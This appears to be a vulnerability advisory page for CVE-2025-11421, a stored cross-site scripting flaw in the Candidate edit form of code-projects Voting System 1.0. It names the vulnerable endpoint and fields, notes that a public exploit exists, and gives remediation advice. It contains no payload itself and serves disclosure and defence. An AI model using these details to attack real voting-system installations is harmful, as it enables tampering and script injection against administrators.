code-projects Voting System CVE-2025-11421
LOWSeverity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
1DescriptionCVE.org
A flaw has been found in code-projects Voting System 1.0. The affected element is an unknown function of the file /admin/candidates_edit.php. This manipulation of the argument Firstname/Lastname/Platform causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been published and may be used.
AnalysisAI
Stored cross-site scripting (XSS) in code-projects Voting System 1.0 allows authenticated users with low privileges to inject malicious scripts via the Firstname, Lastname, or Platform parameters in /admin/candidates_edit.php, which execute in the context of other users' browsers when the edited candidate record is viewed. The vulnerability requires user interaction (UI:P) but affects integrity of data displayed to administrators. Exploit code is publicly available on GitHub, though EPSS score of 0.03% indicates limited real-world exploitation despite published POC.
Technical ContextAI
The vulnerability is a reflected or stored XSS flaw (CWE-79) in a PHP-based voting system web application. The affected endpoint /admin/candidates_edit.php fails to properly sanitize or encode user-supplied input in candidate profile fields (Firstname, Lastname, Platform) before storing or displaying them. This allows injection of JavaScript code that executes when administrators or other users view the manipulated candidate records. The attack vector is network-accessible (AV:N) and requires only low-privilege authentication (PR:L), suggesting the application has role-based access control where authenticated users can modify candidate data without proper input validation.
RemediationAI
The primary remediation is to upgrade to a patched version if available from the vendor at code-projects.org; however, no patched version number is confirmed in available data. Immediate compensating controls: (1) Apply HTML entity encoding (htmlspecialchars() with ENT_QUOTES flag in PHP) to all output of the Firstname, Lastname, and Platform fields in both edit forms and candidate display pages to prevent XSS execution. (2) Implement input validation to reject or strip script tags and event handlers from these fields on both client and server side. (3) Restrict access to /admin/candidates_edit.php to only administrative users with verified need, using role-based access control (RBAC), reducing the pool of potential attackers. (4) Enable Content Security Policy (CSP) headers with script-src 'self' to limit inline script execution. These controls address the root cause (improper output encoding) without requiring application restart. Note that input validation alone is insufficient without output encoding, as data may be legitimately stored and later displayed in contexts where encoding is essential.
More from same product – last 7 days
Authentication bypass in Discuz! X5.0 releases 20260320 through 20260501 allows unauthenticated remote attackers to acce
Authenticated remote code execution in Discuz! X5.0 releases 20260320 through 20260501 allows administrators to chain a
Unauthenticated PHP Object Injection in the Happyforms WordPress plugin (versions <= 1.26.13) allows remote attackers to
Unauthenticated PHP Object Injection in the Broadcast Live Video WordPress plugin (versions prior to 7.1.3) allows remot
Unauthenticated PHP object injection in the WordPress plugin 'Integration for Keap/Infusionsoft and Contact Form 7, WPFo
Share
External POC / Exploit Code
Leaving vuln.today